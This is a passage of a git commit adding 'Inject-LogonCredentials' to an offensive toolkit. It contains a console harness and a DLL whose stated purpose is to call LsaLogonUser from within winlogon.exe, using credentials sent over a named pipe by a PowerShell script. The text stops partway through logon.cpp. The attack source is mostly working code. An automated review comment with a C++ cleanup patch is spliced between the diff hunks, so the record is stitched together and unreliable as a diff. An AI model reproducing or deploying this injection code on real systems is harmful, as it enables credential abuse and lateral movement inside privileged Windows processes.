authorclymb3r <bialek.joseph@gmail.com>2013-11-17 21:13:15 -0800
committerclymb3r <bialek.joseph@gmail.com>2013-11-17 21:13:15 -0800
commit1503375bfbf0ee7ade498ea77444a4f1db4873e4 (patch)
tree1aa744fc4d81ca649c4e6ee75bab1903446681f8 /Exfiltration/LogonUser
parent5af0589e8f97aa49aef6bd083a00a4689c7553aa (diff)
Adding Inject-LogonCredentials
Diffstat (limited to 'Exfiltration/LogonUser')
-rw-r--r--Exfiltration/LogonUser/LogonUser/LogonUser.sln26
-rw-r--r--Exfiltration/LogonUser/LogonUser/LogonUser/LogonUser.cpp137
-rw-r--r--Exfiltration/LogonUser/LogonUser/LogonUser/LogonUser.vcxproj158
-rw-r--r--Exfiltration/LogonUser/LogonUser/LogonUser/LogonUser.vcxproj.filters36
-rw-r--r--Exfiltration/LogonUser/LogonUser/LogonUser/ReadMe.txt40
-rw-r--r--Exfiltration/LogonUser/LogonUser/LogonUser/stdafx.cpp8
-rw-r--r--Exfiltration/LogonUser/LogonUser/LogonUser/stdafx.h20
-rw-r--r--Exfiltration/LogonUser/LogonUser/LogonUser/targetver.h8
-rw-r--r--Exfiltration/LogonUser/LogonUser/logon/ReadMe.txt48
-rw-r--r--Exfiltration/LogonUser/LogonUser/logon/dllmain.cpp19
-rw-r--r--Exfiltration/LogonUser/LogonUser/logon/logon.cpp258
-rw-r--r--Exfiltration/LogonUser/LogonUser/logon/logon.vcxproj176
-rw-r--r--Exfiltration/LogonUser/LogonUser/logon/logon.vcxproj.filters39
-rw-r--r--Exfiltration/LogonUser/LogonUser/logon/stdafx.cpp8
-rw-r--r--Exfiltration/LogonUser/LogonUser/logon/stdafx.h25
-rw-r--r--Exfiltration/LogonUser/LogonUser/logon/targetver.h8
16 files changed, 1014 insertions, 0 deletions
diff --git a/Exfiltration/LogonUser/LogonUser/LogonUser.sln b/Exfiltration/LogonUser/LogonUser/LogonUser.sln
new file mode 100644
index 0000000..890e833
--- /dev/null
+++ b/Exfiltration/LogonUser/LogonUser/LogonUser.sln
@@ -0,0 +1,26 @@
+
+Microsoft Visual Studio Solution File, Format Version 12.00
+# Visual Studio 2012
+Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "logon", "logon\logon.vcxproj", "{D248AC1C-B831-42AE-835A-1B98B2BF9DF3}"
+EndProject
+Global
+ GlobalSection(SolutionConfigurationPlatforms) = preSolution
+ Debug|Win32 = Debug|Win32
+ Debug|x64 = Debug|x64
+ Release|Win32 = Release|Win32
+ Release|x64 = Release|x64
+ EndGlobalSection
+ GlobalSection(ProjectConfigurationPlatforms) = postSolution
+ {D248AC1C-B831-42AE-835A-1B98B2BF9DF3}.Debug|Win32.ActiveCfg = Debug|Win32
+ {D248AC1C-B831-42AE-835A-1B98B2BF9DF3}.Debug|Win32.Build.0 = Debug|Win32
+ {D248AC1C-B831-42AE-835A-1B98B2BF9DF3}.Debug|x64.ActiveCfg = Debug|x64
+ {D248AC1C-B831-42AE-835A-1B98B2BF9DF3}.Debug|x64.Build.0 = Debug|x64
+ {D248AC1C-B831-42AE-835A-1B98B2BF9DF3}.Release|Win32.ActiveCfg = Release|Win32
+ {D248AC1C-B831-42AE-835A-1B98B2BF9DF3}.Release|Win32.Build.0 = Release|Win32
+ {D248AC1C-B831-42AE-835A-1B98B2BF9DF3}.Release|x64.ActiveCfg = Release|x64
+ {D248AC1C-B831-42AE-835A-1B98B2BF9DF3}.Release|x64.Build.0 = Release|x64
+ EndGlobalSection
+ GlobalSection(SolutionProperties) = preSolution
+ HideSolutionNode = FALSE
+ EndGlobalSection
+EndGlobal
diff --git a/Exfiltration/LogonUser/LogonUser/LogonUser/LogonUser.cpp b/Exfiltration/LogonUser/LogonUser/LogonUser/LogonUser.cpp
new file mode 100644
index 0000000..f5b39fd
--- /dev/null
+++ b/Exfiltration/LogonUser/LogonUser/LogonUser/LogonUser.cpp
@@ -0,0 +1,137 @@
+// LogonUser.cpp : Defines the entry point for the console application.
+//
+
+#include "stdafx.h"
+
+using namespace std;
+
+size_t wcsByteLen( const wchar_t* str );
+void InitUnicodeString( UNICODE_STRING& str, const wchar_t* value, BYTE* buffer, size_t& offset );
+PVOID CreateNtlmLogonStructure(wstring domain, wstring username, wstring password, DWORD* size);
+size_t WriteUnicodeString(wstring str, UNICODE_STRING* uniStr, PVOID baseAddress, size_t offset);
+
+int _tmain(int argc, _TCHAR* argv[])
+{
+ //Get a handle to LSA
+ HANDLE hLSA = NULL;
+ NTSTATUS status = LsaConnectUntrusted(&hLSA);
+ if (status != 0)
+ {
+ cout << "Error calling LsaConnectUntrusted. Error code: " << status << endl;
+ return -1;
+ }
+ if (hLSA == NULL)
+ {
+ cout << "hLSA is NULL, this shouldn't ever happen" << endl;
+ return -1;
+ }
+
+ //Build LsaLogonUser parameters
+ LSA_STRING originName = {};
+ char originNameStr[] = "qpqp";
+ originName.Buffer = originNameStr;
+ originName.Length = (USHORT)strlen(originNameStr);
+ originName.MaximumLength = originName.Length;
+
+ ULONG authPackage = 0;
+ PLSA_STRING authPackageName = new LSA_STRING();
+ char authPackageBuf[] = MSV1_0_PACKAGE_NAME;
+ authPackageName->Buffer = authPackageBuf;
+ authPackageName->Length = (USHORT)strlen(authPackageBuf);
+ authPackageName->MaximumLength = (USHORT)strlen(authPackageBuf);
+ status = LsaLookupAuthenticationPackage(hLSA, authPackageName, &authPackage);
+ if (status != 0)
+ {
+ int winError = LsaNtStatusToWinError(status);
+ cout << "Call to LsaLookupAuthenticationPackage failed. Error code: " << winError;
+ return -1;
+ }
+
+ DWORD authBufferSize = 0;
+ PVOID authBuffer = CreateNtlmLogonStructure(L"VMWORKSTATION", L"testuser", L"Password1", &authBufferSize);
+ cout << "authBufferSize: " << authBufferSize << endl;
+
+ //Get TokenSource
+ HANDLE hProcess = GetCurrentProcess();//todo
+ HANDLE procToken = NULL;
+ BOOL success = OpenProcessToken(hProcess, TOKEN_ALL_ACCESS, &procToken);
+ if (!success)
+ {
+ DWORD errorCode = GetLastError();
+ cout << "Call to OpenProcessToken failed. Errorcode: " << errorCode << endl;
+ return -1;
+ }
+
+ TOKEN_SOURCE tokenSource = {};
+ DWORD realSize = 0;
+ success = GetTokenInformation(procToken, TokenSource, &tokenSource, sizeof(tokenSource), &realSize);
+ if (!success)
+ {
+ cout << "Call to GetTokenInformation failed." << endl;
+ return -1;
+ }
+
+
+ //Misc
+ PVOID profileBuffer = NULL;
+ ULONG profileBufferSize = 0;
+ LUID loginId;
+ HANDLE token = NULL;
+ QUOTA_LIMITS quotaLimits;
+ NTSTATUS subStatus = 0;
+
+ status = LsaLogonUser(hLSA,
+ &originName,
+ RemoteInteractive,
+ authPackage,
+ authBuffer,
+ authBufferSize,
+ 0,
+ &tokenSource,
+ &profileBuffer,
+ &profileBufferSize,
+ &loginId,
+ &token,
+ &quotaLimits,
+ &subStatus);
+
+ if (status != 0)
+ {
+ NTSTATUS winError = LsaNtStatusToWinError(status);
+ cout << "Error calling LsaLogonUser. Error code: " << winError << endl;
+ return -1;
+ }
+
+ cout << "Success!" << endl;
+
+ return 1;
+}
+
+//size will be set to the size of the structure created
+PVOID CreateNtlmLogonStructure(wstring domain, wstring username, wstring password, DWORD* size)
+{
+ size_t wcharSize = sizeof(wchar_t);
+
+ size_t totalSize = sizeof(MSV1_0_INTERACTIVE_LOGON) + ((domain.length() + username.length() + password.length()) * wcharSize);
+ MSV1_0_INTERACTIVE_LOGON* ntlmLogon = (PMSV1_0_INTERACTIVE_LOGON)(new BYTE[totalSize]);
+ size_t offset = sizeof(MSV1_0_INTERACTIVE_LOGON);
+
+ ntlmLogon->MessageType = MsV1_0InteractiveLogon;
+ offset += WriteUnicodeString(domain, &(ntlmLogon->LogonDomainName), ntlmLogon, offset);
+ offset += WriteUnicodeString(username, &(ntlmLogon->UserName), ntlmLogon, offset);
+ offset += WriteUnicodeString(password, &(ntlmLogon->Password), ntlmLogon, offset);
+
+ *size = (DWORD)totalSize; //If the size is bigger than a DWORD, there is a gigantic bug somewhere.
+ return ntlmLogon;
+}
+
+size_t WriteUnicodeString(wstring str, UNICODE_STRING* uniStr, PVOID baseAddress, size_t offset)
+{
+ const wchar_t* buffer = str.c_str();
+ size_t size = str.length() * sizeof(wchar_t);
+ uniStr->Length = (USHORT)size;
+ uniStr->MaximumLength = (USHORT)size;
+ uniStr->Buffer = (PWSTR)((UINT_PTR)baseAddress + offset);
+ memcpy((PVOID)((UINT_PTR)baseAddress + offset), str.c_str(), size);
+ return size;
+} \ No newline at end of file
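Review bot: `_tmain` releases nothing it acquires — the buffer returned by `CreateNtlmLogonStructure` (which holds the plaintext password), the `new LSA_STRING()` assigned to `authPackageName`, `procToken`, `token`, `profileBuffer` and `hLSA` are all still live when the function returns, and the `return 1` on the success path reads as a failure to anything that checks the exit code. Wipe and free the logon buffer directly after the `LsaLogonUser` call, release the handles and the LSA return buffer before returning, and return 0 on success. The domain, user name and password are also compiled into the binary as literals at the `CreateNtlmLogonStructure` call; since this is the console harness for the DLL, taking them from `argv` keeps credentials out of the source tree. The same missing cleanup recurs in `VoidFunc` in logon.cpp.
```cpp
    // … unchanged: LsaLogonUser call …

    // The logon structure carries the plaintext password; wipe it as soon as
    // LSA has consumed it, then release everything else acquired above.
    SecureZeroMemory(authBuffer, authBufferSize);
    delete[] static_cast<BYTE*>(authBuffer);
    delete authPackageName;
    CloseHandle(procToken);
    if (status != 0)
    {
        NTSTATUS winError = LsaNtStatusToWinError(status);
        cout << "Error calling LsaLogonUser. Error code: " << winError << endl;
        LsaDeregisterLogonProcess(hLSA);
        return -1;
    }
    LsaFreeReturnBuffer(profileBuffer);
    CloseHandle(token);
    LsaDeregisterLogonProcess(hLSA);
    cout << "Success!" << endl;
    return 0;
```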
diff --git a/Exfiltration/LogonUser/LogonUser/LogonUser/LogonUser.vcxproj b/Exfiltration/LogonUser/LogonUser/LogonUser/LogonUser.vcxproj
new file mode 100644
index 0000000..7fd8de2
--- /dev/null
+++ b/Exfiltration/LogonUser/LogonUser/LogonUser/LogonUser.vcxproj
@@ -0,0 +1,158 @@
+<?xml version="1.0" encoding="utf-8"?>
+<Project DefaultTargets="Build" ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+ <ItemGroup Label="ProjectConfigurations">
+ <ProjectConfiguration Include="Debug|Win32">
+ <Configuration>Debug</Configuration>
+ <Platform>Win32</Platform>
+ </ProjectConfiguration>
+ <ProjectConfiguration Include="Debug|x64">
+ <Configuration>Debug</Configuration>
+ <Platform>x64</Platform>
+ </ProjectConfiguration>
+ <ProjectConfiguration Include="Release|Win32">
+ <Configuration>Release</Configuration>
+ <Platform>Win32</Platform>
+ </ProjectConfiguration>
+ <ProjectConfiguration Include="Release|x64">
+ <Configuration>Release</Configuration>
+ <Platform>x64</Platform>
+ </ProjectConfiguration>
+ </ItemGroup>
+ <PropertyGroup Label="Globals">
+ <ProjectGuid>{F9DC2AAF-2213-4D87-9F52-283DA1CC6E18}</ProjectGuid>
+ <Keyword>Win32Proj</Keyword>
+ <RootNamespace>LogonUser</RootNamespace>
+ </PropertyGroup>
+ <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
+ <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
+ <ConfigurationType>Application</ConfigurationType>
+ <UseDebugLibraries>true</UseDebugLibraries>
+ <PlatformToolset>v110</PlatformToolset>
+ <CharacterSet>Unicode</CharacterSet>
+ </PropertyGroup>
+ <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
+ <ConfigurationType>Application</ConfigurationType>
+ <UseDebugLibraries>true</UseDebugLibraries>
+ <PlatformToolset>v110</PlatformToolset>
+ <CharacterSet>Unicode</CharacterSet>
+ </PropertyGroup>
+ <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
+ <ConfigurationType>Application</ConfigurationType>
+ <UseDebugLibraries>false</UseDebugLibraries>
+ <PlatformToolset>v110</PlatformToolset>
+ <WholeProgramOptimization>true</WholeProgramOptimization>
+ <CharacterSet>Unicode</CharacterSet>
+ </PropertyGroup>
+ <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
+ <ConfigurationType>Application</ConfigurationType>
+ <UseDebugLibraries>false</UseDebugLibraries>
+ <PlatformToolset>v110</PlatformToolset>
+ <WholeProgramOptimization>true</WholeProgramOptimization>
+ <CharacterSet>Unicode</CharacterSet>
+ </PropertyGroup>
+ <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
+ <ImportGroup Label="ExtensionSettings">
+ </ImportGroup>
+ <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
+ <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+ </ImportGroup>
+ <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="PropertySheets">
+ <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+ </ImportGroup>
+ <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+ <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+ </ImportGroup>
+ <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets">
+ <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+ </ImportGroup>
+ <PropertyGroup Label="UserMacros" />
+ <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
+ <LinkIncremental>true</LinkIncremental>
+ </PropertyGroup>
+ <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
+ <LinkIncremental>true</LinkIncremental>
+ </PropertyGroup>
+ <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+ <LinkIncremental>false</LinkIncremental>
+ </PropertyGroup>
+ <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
+ <LinkIncremental>false</LinkIncremental>
+ </PropertyGroup>
+ <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
+ <ClCompile>
+ <PrecompiledHeader>Use</PrecompiledHeader>
+ <WarningLevel>Level3</WarningLevel>
+ <Optimization>Disabled</Optimization>
+ <PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+ </ClCompile>
+ <Link>
+ <SubSystem>Console</SubSystem>
+ <GenerateDebugInformation>true</GenerateDebugInformation>
+ <AdditionalDependencies>secur32.lib;%(AdditionalDependencies)</AdditionalDependencies>
+ </Link>
+ </ItemDefinitionGroup>
+ <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
+ <ClCompile>
+ <PrecompiledHeader>Use</PrecompiledHeader>
+ <WarningLevel>Level3</WarningLevel>
+ <Optimization>Disabled</Optimization>
+ <PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+ </ClCompile>
+ <Link>
+ <SubSystem>Console</SubSystem>
+ <GenerateDebugInformation>true</GenerateDebugInformation>
+ <AdditionalDependencies>secur32.lib;%(AdditionalDependencies)</AdditionalDependencies>
+ </Link>
+ </ItemDefinitionGroup>
+ <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+ <ClCompile>
+ <WarningLevel>Level3</WarningLevel>
+ <PrecompiledHeader>Use</PrecompiledHeader>
+ <Optimization>MaxSpeed</Optimization>
+ <FunctionLevelLinking>true</FunctionLevelLinking>
+ <IntrinsicFunctions>true</IntrinsicFunctions>
+ <PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+ </ClCompile>
+ <Link>
+ <SubSystem>Console</SubSystem>
+ <GenerateDebugInformation>true</GenerateDebugInformation>
+ <EnableCOMDATFolding>true</EnableCOMDATFolding>
+ <OptimizeReferences>true</OptimizeReferences>
+ </Link>
+ </ItemDefinitionGroup>
+ <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
+ <ClCompile>
+ <WarningLevel>Level3</WarningLevel>
+ <PrecompiledHeader>Use</PrecompiledHeader>
+ <Optimization>MaxSpeed</Optimization>
+ <FunctionLevelLinking>true</FunctionLevelLinking>
+ <IntrinsicFunctions>true</IntrinsicFunctions>
+ <PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+ </ClCompile>
+ <Link>
+ <SubSystem>Console</SubSystem>
+ <GenerateDebugInformation>true</GenerateDebugInformation>
+ <EnableCOMDATFolding>true</EnableCOMDATFolding>
+ <OptimizeReferences>true</OptimizeReferences>
+ </Link>
+ </ItemDefinitionGroup>
+ <ItemGroup>
+ <Text Include="ReadMe.txt" />
+ </ItemGroup>
+ <ItemGroup>
+ <ClInclude Include="stdafx.h" />
+ <ClInclude Include="targetver.h" />
+ </ItemGroup>
+ <ItemGroup>
+ <ClCompile Include="LogonUser.cpp" />
+ <ClCompile Include="stdafx.cpp">
+ <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">Create</PrecompiledHeader>
+ <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">Create</PrecompiledHeader>
+ <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">Create</PrecompiledHeader>
+ <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|x64'">Create</PrecompiledHeader>
+ </ClCompile>
+ </ItemGroup>
+ <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
+ <ImportGroup Label="ExtensionTargets">
+ </ImportGroup>
+</Project> \ No newline at end of file
diff --git a/Exfiltration/LogonUser/LogonUser/LogonUser/LogonUser.vcxproj.filters b/Exfiltration/LogonUser/LogonUser/LogonUser/LogonUser.vcxproj.filters
new file mode 100644
index 0000000..f92726f
--- /dev/null
+++ b/Exfiltration/LogonUser/LogonUser/LogonUser/LogonUser.vcxproj.filters
@@ -0,0 +1,36 @@
+<?xml version="1.0" encoding="utf-8"?>
+<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+ <ItemGroup>
+ <Filter Include="Source Files">
+ <UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
+ <Extensions>cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
+ </Filter>
+ <Filter Include="Header Files">
+ <UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
+ <Extensions>h;hpp;hxx;hm;inl;inc;xsd</Extensions>
+ </Filter>
+ <Filter Include="Resource Files">
+ <UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
+ <Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
+ </Filter>
+ </ItemGroup>
+ <ItemGroup>
+ <Text Include="ReadMe.txt" />
+ </ItemGroup>
+ <ItemGroup>
+ <ClInclude Include="stdafx.h">
+ <Filter>Header Files</Filter>
+ </ClInclude>
+ <ClInclude Include="targetver.h">
+ <Filter>Header Files</Filter>
+ </ClInclude>
+ </ItemGroup>
+ <ItemGroup>
+ <ClCompile Include="stdafx.cpp">
+ <Filter>Source Files</Filter>
+ </ClCompile>
+ <ClCompile Include="LogonUser.cpp">
+ <Filter>Source Files</Filter>
+ </ClCompile>
+ </ItemGroup>
+</Project> \ No newline at end of file
diff --git a/Exfiltration/LogonUser/LogonUser/LogonUser/ReadMe.txt b/Exfiltration/LogonUser/LogonUser/LogonUser/ReadMe.txt
new file mode 100644
index 0000000..8275e56
--- /dev/null
+++ b/Exfiltration/LogonUser/LogonUser/LogonUser/ReadMe.txt
@@ -0,0 +1,40 @@
+========================================================================
+ CONSOLE APPLICATION : LogonUser Project Overview
+========================================================================
+
+AppWizard has created this LogonUser application for you.
+
+This file contains a summary of what you will find in each of the files that
+make up your LogonUser application.
+
+
+LogonUser.vcxproj
+ This is the main project file for VC++ projects generated using an Application Wizard.
+ It contains information about the version of Visual C++ that generated the file, and
+ information about the platforms, configurations, and project features selected with the
+ Application Wizard.
+
+LogonUser.vcxproj.filters
+ This is the filters file for VC++ projects generated using an Application Wizard.
+ It contains information about the association between the files in your project
+ and the filters. This association is used in the IDE to show grouping of files with
+ similar extensions under a specific node (for e.g. ".cpp" files are associated with the
+ "Source Files" filter).
+
+LogonUser.cpp
+ This is the main application source file.
+
+/////////////////////////////////////////////////////////////////////////////
+Other standard files:
+
+StdAfx.h, StdAfx.cpp
+ These files are used to build a precompiled header (PCH) file
+ named LogonUser.pch and a precompiled types file named StdAfx.obj.
+
+/////////////////////////////////////////////////////////////////////////////
+Other notes:
+
+AppWizard uses "TODO:" comments to indicate parts of the source code you
+should add to or customize.
+
+/////////////////////////////////////////////////////////////////////////////
diff --git a/Exfiltration/LogonUser/LogonUser/LogonUser/stdafx.cpp b/Exfiltration/LogonUser/LogonUser/LogonUser/stdafx.cpp
new file mode 100644
index 0000000..d213d3a
--- /dev/null
+++ b/Exfiltration/LogonUser/LogonUser/LogonUser/stdafx.cpp
@@ -0,0 +1,8 @@
+// stdafx.cpp : source file that includes just the standard includes
+// LogonUser.pch will be the pre-compiled header
+// stdafx.obj will contain the pre-compiled type information
+
+#include "stdafx.h"
+
+// TODO: reference any additional headers you need in STDAFX.H
+// and not in this file
diff --git a/Exfiltration/LogonUser/LogonUser/LogonUser/stdafx.h b/Exfiltration/LogonUser/LogonUser/LogonUser/stdafx.h
new file mode 100644
index 0000000..cb2a53f
--- /dev/null
+++ b/Exfiltration/LogonUser/LogonUser/LogonUser/stdafx.h
@@ -0,0 +1,20 @@
+// stdafx.h : include file for standard system include files,
+// or project specific include files that are used frequently, but
+// are changed infrequently
+//
+
+#pragma once
+
+#include "targetver.h"
+#include <stdio.h>
+#include <tchar.h>
+#include <iostream>
+#include <string>
+#include <Windows.h>
+#include <NTSecAPI.h>
+
+
+
+
+
+// TODO: reference additional headers your program requires here
diff --git a/Exfiltration/LogonUser/LogonUser/LogonUser/targetver.h b/Exfiltration/LogonUser/LogonUser/LogonUser/targetver.h
new file mode 100644
index 0000000..87c0086
--- /dev/null
+++ b/Exfiltration/LogonUser/LogonUser/LogonUser/targetver.h
@@ -0,0 +1,8 @@
+#pragma once
+
+// Including SDKDDKVer.h defines the highest available Windows platform.
+
+// If you wish to build your application for a previous Windows platform, include WinSDKVer.h and
+// set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h.
+
+#include <SDKDDKVer.h>
diff --git a/Exfiltration/LogonUser/LogonUser/logon/ReadMe.txt b/Exfiltration/LogonUser/LogonUser/logon/ReadMe.txt
new file mode 100644
index 0000000..605d341
--- /dev/null
+++ b/Exfiltration/LogonUser/LogonUser/logon/ReadMe.txt
@@ -0,0 +1,48 @@
+========================================================================
+ DYNAMIC LINK LIBRARY : logon Project Overview
+========================================================================
+
+AppWizard has created this logon DLL for you.
+
+This file contains a summary of what you will find in each of the files that
+make up your logon application.
+
+
+logon.vcxproj
+ This is the main project file for VC++ projects generated using an Application Wizard.
+ It contains information about the version of Visual C++ that generated the file, and
+ information about the platforms, configurations, and project features selected with the
+ Application Wizard.
+
+logon.vcxproj.filters
+ This is the filters file for VC++ projects generated using an Application Wizard.
+ It contains information about the association between the files in your project
+ and the filters. This association is used in the IDE to show grouping of files with
+ similar extensions under a specific node (for e.g. ".cpp" files are associated with the
+ "Source Files" filter).
+
+logon.cpp
+ This is the main DLL source file.
+
+ When created, this DLL does not export any symbols. As a result, it
+ will not produce a .lib file when it is built. If you wish this project
+ to be a project dependency of some other project, you will either need to
+ add code to export some symbols from the DLL so that an export library
+ will be produced, or you can set the Ignore Input Library property to Yes
+ on the General propert page of the Linker folder in the project's Property
+ Pages dialog box.
+
+/////////////////////////////////////////////////////////////////////////////
+Other standard files:
+
+StdAfx.h, StdAfx.cpp
+ These files are used to build a precompiled header (PCH) file
+ named logon.pch and a precompiled types file named StdAfx.obj.
+
+/////////////////////////////////////////////////////////////////////////////
+Other notes:
+
+AppWizard uses "TODO:" comments to indicate parts of the source code you
+should add to or customize.
+
+/////////////////////////////////////////////////////////////////////////////
diff --git a/Exfiltration/LogonUser/LogonUser/logon/dllmain.cpp b/Exfiltration/LogonUser/LogonUser/logon/dllmain.cpp
new file mode 100644
index 0000000..69b5891
--- /dev/null
+++ b/Exfiltration/LogonUser/LogonUser/logon/dllmain.cpp
@@ -0,0 +1,19 @@
+// dllmain.cpp : Defines the entry point for the DLL application.
+#include "stdafx.h"
+
+BOOL APIENTRY DllMain( HMODULE hModule,
+ DWORD ul_reason_for_call,
+ LPVOID lpReserved
+ )
+{
+ switch (ul_reason_for_call)
+ {
+ case DLL_PROCESS_ATTACH:
+ case DLL_THREAD_ATTACH:
+ case DLL_THREAD_DETACH:
+ case DLL_PROCESS_DETACH:
+ break;
+ }
+ return TRUE;
+}
+
diff --git a/Exfiltration/LogonUser/LogonUser/logon/logon.cpp b/Exfiltration/LogonUser/LogonUser/logon/logon.cpp
new file mode 100644
index 0000000..8011ed8
--- /dev/null
+++ b/Exfiltration/LogonUser/LogonUser/logon/logon.cpp
@@ -0,0 +1,258 @@
+// logon.cpp : Defines the exported functions for the DLL application.
+//
+
+#include "stdafx.h"
+
+using namespace std;
+
+size_t wcsByteLen( const wchar_t* str );
+void InitUnicodeString( UNICODE_STRING& str, const wchar_t* value, BYTE* buffer, size_t& offset );
+PVOID CreateKerbLogonStructure(const wchar_t* domain, const wchar_t* username, const wchar_t* password, DWORD* size);
+PVOID CreateNtlmLogonStructure(const wchar_t* domain, const wchar_t* username, const wchar_t* password, DWORD* size);
+size_t WriteUnicodeString(const wchar_t* str, UNICODE_STRING* uniStr, PVOID address);
+void WriteErrorToPipe(string errorMsg, HANDLE pipe);
+
+extern "C" __declspec( dllexport ) void VoidFunc();
+
+
+//The entire point of this code is to call LsaLogonUser from within winlogon.exe
+extern "C" __declspec( dllexport ) void VoidFunc()
+{
+ //Open a pipe which will receive data from the PowerShell script.
+ HANDLE pipe = CreateFile(L"\\\\.\\pipe\\sqsvc", GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
+ if (pipe == INVALID_HANDLE_VALUE)
+ {
+ return;
+ }
+
+ const size_t strSize = 257;
+ size_t bytesToRead = strSize * sizeof(wchar_t) - sizeof(wchar_t);
+ wchar_t* domain = new wchar_t[strSize];
+ wchar_t* username = new wchar_t[strSize];
+ wchar_t* password = new wchar_t[strSize];
+ DWORD bytesRead = 0;
+
+ BOOL success = ReadFile(pipe, domain, strSize, &bytesRead, NULL);
+ if (!success)
+ {
+ return;
+ }
+ domain[bytesRead/2] = '\0';
+
+ success = ReadFile(pipe, username, strSize-2, &bytesRead, NULL);
+ if (!success)
+ {
+ return;
+ }
+ username[bytesRead/2] = '\0';
+
+ success = ReadFile(pipe, password, strSize-2, &bytesRead, NULL);
+ if (!success)
+ {
+ return;
+ }
+ password[bytesRead/2] = '\0';
+
+ //Get the logon type from the pipe
+ USHORT logonType = 10;
+ success = ReadFile(pipe, &logonType, 1, &bytesRead, NULL);
+ if (!success)
+ {
+ return;
+ }
+
+ //Get the authentication package to use. 1 = Msv1_0, 2 = Kerberos
+ USHORT authPackageToUse = 0;
+ success = ReadFile(pipe, &authPackageToUse, 1, &bytesRead, NULL);
+ if (!success)
+ {
+ return;
+ }
+
+
+ /////////////
+ //Build the parameters to call LsaLogonUser with
+ /////////////
+
+ //Get a handle to LSA
+ HANDLE hLSA = NULL;
+ NTSTATUS status = LsaConnectUntrusted(&hLSA);
+ if (status != 0)
+ {
+ string errorMsg = "Error calling LsaConnectUntrusted. Error code: " + to_string(status);
+ WriteErrorToPipe(errorMsg, pipe);
+ return;
+ }
+ if (hLSA == NULL)
+ {
+ string errorMsg = "hLSA (LSA handle) is NULL, this shouldn't ever happen.";
+ WriteErrorToPipe(errorMsg, pipe);
+ return;
+ }
+
+ //Build LsaLogonUser parameters
+ LSA_STRING originName = {};
+ char originNameStr[] = "";
+ originName.Buffer = originNameStr;
+ originName.Length = (USHORT)0;
+ originName.MaximumLength = 0;
+
+ //Build the authentication package parameter based on the auth package the powershell script specified to use
+ //Also get the AuthenticationInformation
+ char* authPackageBuf = NULL;
+ DWORD authBufferSize = 0;
+ PVOID authBuffer = NULL;
+ if (authPackageToUse == 1)
+ {
+ authPackageBuf = MSV1_0_PACKAGE_NAME;
+ authBuffer = CreateNtlmLogonStructure(domain, username, password, &authBufferSize);
+ }
+ else if (authPackageToUse == 2)
+ {
+ authPackageBuf = MICROSOFT_KERBEROS_NAME_A;
+ authBuffer = CreateKerbLogonStructure(domain, username, password, &authBufferSize);
+ }
+ else
+ {
+ string errorMsg = "Received an invalid auth package from the named pipe";
+ WriteErrorToPipe(errorMsg, pipe);
+ return;
+ }
+
+ ULONG authPackage = 0;
